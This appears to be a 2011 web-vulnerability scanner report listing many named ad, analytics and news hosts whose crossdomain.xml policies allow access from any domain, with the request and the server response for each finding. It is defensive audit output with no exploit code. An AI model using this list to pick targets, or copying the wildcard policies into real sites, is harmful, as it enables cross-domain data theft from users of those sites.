HTTP/1.1 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT Accept-Ranges: bytes ETag: "8e43ce60b7d5ca1:12e5" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Mon, 09 May 2011 15:35:08 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: amch.questionmarket.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:40:02 GMT Server: Apache/2.2.3 Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT ETag: "e0686c83-d1-4100ff9 Accept-Ranges: bytes Content-Length: 209 Keep-Alive: timeout=5, max=977 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://analytics.newsinc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: analytics.newsinc.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Mon, 09 May 2011 15:37:50 GMT ETag: "b485279b64cb1:0" Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT NDN-Server: Ana03 NDN-SiteVer: 3.0 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 286 Connection: Close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> <allow-ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:22 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://assets1.grouponcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: assets1.grouponcdn.com |
HTTP/1.0 200 OK Server: nginx/0.7.65 Content-Type: text/xml Accept-Ranges: bytes Age: 253988 Date: Mon, 09 May 2011 15:35:37 GMT Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT Content-Length: 352 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80,443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://at.amgdgt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: at.amgdgt.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:46 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "308cb3d-12e-4871688 Accept-Ranges: bytes Content-Length: 302 Cache-Control: max-age=21600 Expires: Mon, 09 May 2011 21:35:46 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="all" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Tue, 10 May 2011 15:34:58 GMT Date: Mon, 09 May 2011 15:34:58 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.voicefive.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Tue, 10 May 2011 15:35:23 GMT Date: Mon, 09 May 2011 15:35:23 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b3.mookie1.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:57 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT ETag: "1ff0231-d0-4893a095c6040 Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml Set-Cookie: NSC_o4efm_qppm_iuuq <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"384-1279190951000" Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT Content-Type: application/xml Content-Length: 384 Date: Mon, 09 May 2011 15:39:18 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.contxtweb.com --> <cross-domain-policy> <site-contro ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 09 May 2011 15:38:51 GMT Connection: close Content-Length: 100 <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cache-01 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cache-01.cleanprint.net |
HTTP/1.0 200 OK Server: None ETag: "cb-43afa3566b0c0" Accept-Ranges: bytes X-Server: FD-02 Vary: Accept-Encoding Content-Type: application/xml Content-Language: en Age: 480 Date: Mon, 09 May 2011 15:37:23 GMT Last-Modified: Tue, 25 Sep 2007 18:50:19 GMT Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.gigya.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com |
HTTP/1.0 200 OK Content-Length: 355 Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 x-server: web101 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Mon, 09 May 2011 15:36:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.interclick.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.interclick.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:26 GMT Server: PWS/1.7.2.1 X-Px: ms iad-agg-n7 ( iad-agg-n12), rf-ht iad-agg-n12 ( origin>CONN) ETag: "7b643f1dafecb1:0" P3P: policyref="http://www Cache-Control: max-age=604800 Expires: Mon, 16 May 2011 15:36:27 GMT Age: 0 Content-Length: 225 Content-Type: text/xml Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT Connection: close ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.taboolasy |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.taboolasyndication |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:30 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 06 Jan 2011 14:11:13 GMT ETag: "578002-199-4992e12fda240 Accept-Ranges: bytes Content-Length: 409 Content-Type: text/xml Cache-Control: private, max-age=31536000 Age: 9996468 Expires: Fri, 13 Jan 2012 22:50:42 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*" to-ports="80,443"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cr0.worthatho |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cr0.worthathousandwords |
HTTP/1.0 200 OK Content-Length: 305 Content-Type: text/xml Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT Accept-Ranges: bytes ETag: "4a57df31d345c91:303" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=3600 Date: Mon, 09 May 2011 15:38:55 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 248 Content-Type: application/xml ETag: "3a9d108-f8-46a2ad4ab2800 X-Varnish: 1842867593 1842831716 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=475 Date: Mon, 09 May 2011 15:36:03 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ds.serving-sys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ds.serving-sys.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT Server: Microsoft-IIS/6.0 Date: Mon, 09 May 2011 15:39:06 GMT Content-Length: 100 Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: event.adxpose.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"203-1304614332000" Last-Modified: Thu, 05 May 2011 16:52:12 GMT Content-Type: application/xml Content-Length: 203 Date: Mon, 09 May 2011 15:35:21 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://finance.fox8live |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: finance.fox8live.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:57 GMT Server: nginx/0.8.15 Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 09 May 2011 15:36:57 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 09 May 2011 01:12:03 GMT Expires: Thu, 05 May 2011 01:09:19 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 51816 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fw.adsafeprotected.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"202-1304446860000" Last-Modified: Tue, 03 May 2011 18:21:00 GMT Content-Type: application/xml Content-Length: 202 Date: Mon, 09 May 2011 15:39:50 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gannett.gcion.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111 <?xml version="1.0" ?><cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://gscounters.gigya |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com |
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:2ae5" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web205 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:36:56 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:12 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ic.nexac.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ic.nexac.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT Accept-Ranges: bytes ETag: "7b643f1dafecb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Mon, 09 May 2011 15:38:39 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: idcs.interclick.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 08 Mar 2011 22:34:09 GMT Accept-Ranges: bytes ETag: "f2db35f1e0ddcb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Mon, 09 May 2011 15:37:52 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: k.collective-media.net |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/plain Content-Length: 187 Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT Accept-Ranges: bytes Date: Mon, 09 May 2011 15:37:00 GMT Connection: close Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:37:00 GMT; path=/; domain=.collective-media P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://log30.doubleverify |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: log30.doubleverify.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT Accept-Ranges: bytes ETag: "034d21c5697ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:38:10 GMT Connection: close Content-Length: 378 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-dom ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://map.media6degrees |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: map.media6degrees.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"288-1225232951000" Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT Content-Type: application/xml Content-Length: 288 Date: Mon, 09 May 2011 15:35:20 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.csmonitor |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.csmonitor.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:21 GMT Server: Omniture DC/2.0.0 xserver: www315 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.npr.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.npr.org |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:57 GMT Server: Omniture DC/2.0.0 xserver: www55 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mobile.fox8live.com |
HTTP/1.1 200 OK Cache-Control: max-age=120 Content-Type: text/xml Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT Accept-Ranges: bytes ETag: "0b66c58755c71:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:41:45 GMT Connection: close Content-Length: 121 <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Mon, 09 May 2011 15:36:48 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Tue, 10 May 2011 15:35:02 GMT Content-Type: text/xml Content-Length: 207 Date: Mon, 09 May 2011 15:35:02 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: radar.weather.gov |
HTTP/1.0 200 OK Last-Modified: Fri, 09 Jul 2010 21:50:42 GMT Server: Apache Accept-Ranges: bytes Content-Length: 167 Content-Type: text/xml Cache-Control: max-age=11175 Expires: Mon, 09 May 2011 18:42:55 GMT Date: Mon, 09 May 2011 15:36:40 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://s.meebocdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.meebocdn.net |
HTTP/1.1 200 OK Last-Modified: Tue, 03 May 2011 00:23:33 GMT ETag: "3934951678" Content-Type: text/xml Accept-Ranges: bytes Date: Mon, 09 May 2011 15:35:00 GMT Server: lighttpd/1.4.19 Cache-Control: private, max-age=604800 Age: 59442 Expires: Sun, 15 May 2011 23:04:18 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" secure="False"/> <allow-access-from domain="*.meebo.com" secure="False"/> <allow-http-request <allow-access-from domain="*.meebocdn.net" secure="False"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 09 May 2011 02:46:13 GMT Expires: Tue, 10 May 2011 02:46:13 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 46132 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:19 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 16 May 2011 15:35:19 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://segment-pixel |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 09 May 2011 15:35:40 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://spd.pointroll.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: spd.pointroll.com |
HTTP/1.0 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT Accept-Ranges: bytes ETag: "8e43ce60b7d5ca1:15b0" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Mon, 09 May 2011 15:39:55 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://speed.pointroll |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: speed.pointroll.com |
HTTP/1.0 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT Accept-Ranges: bytes ETag: "8e43ce60b7d5ca1:51d" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:35:10 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://stp.fox8live.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: stp.fox8live.com |
HTTP/1.1 200 OK Cache-Control: max-age=120 Content-Type: text/xml Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT Accept-Ranges: bytes ETag: "0b66c58755c71:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:36:58 GMT Connection: close Content-Length: 121 <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://t.mookie1.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: t.mookie1.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:03 GMT Server: Apache/2.0.52 (Red Hat) Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT ETag: "5d240b9-c9-4a0bfb522d840 Accept-Ranges: bytes Content-Length: 201 Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://t.pointroll.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: t.pointroll.com |
HTTP/1.1 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT Accept-Ranges: bytes ETag: "ef855aa9a7cb1:55e" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Mon, 09 May 2011 15:39:59 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: trc.taboolasyndication |
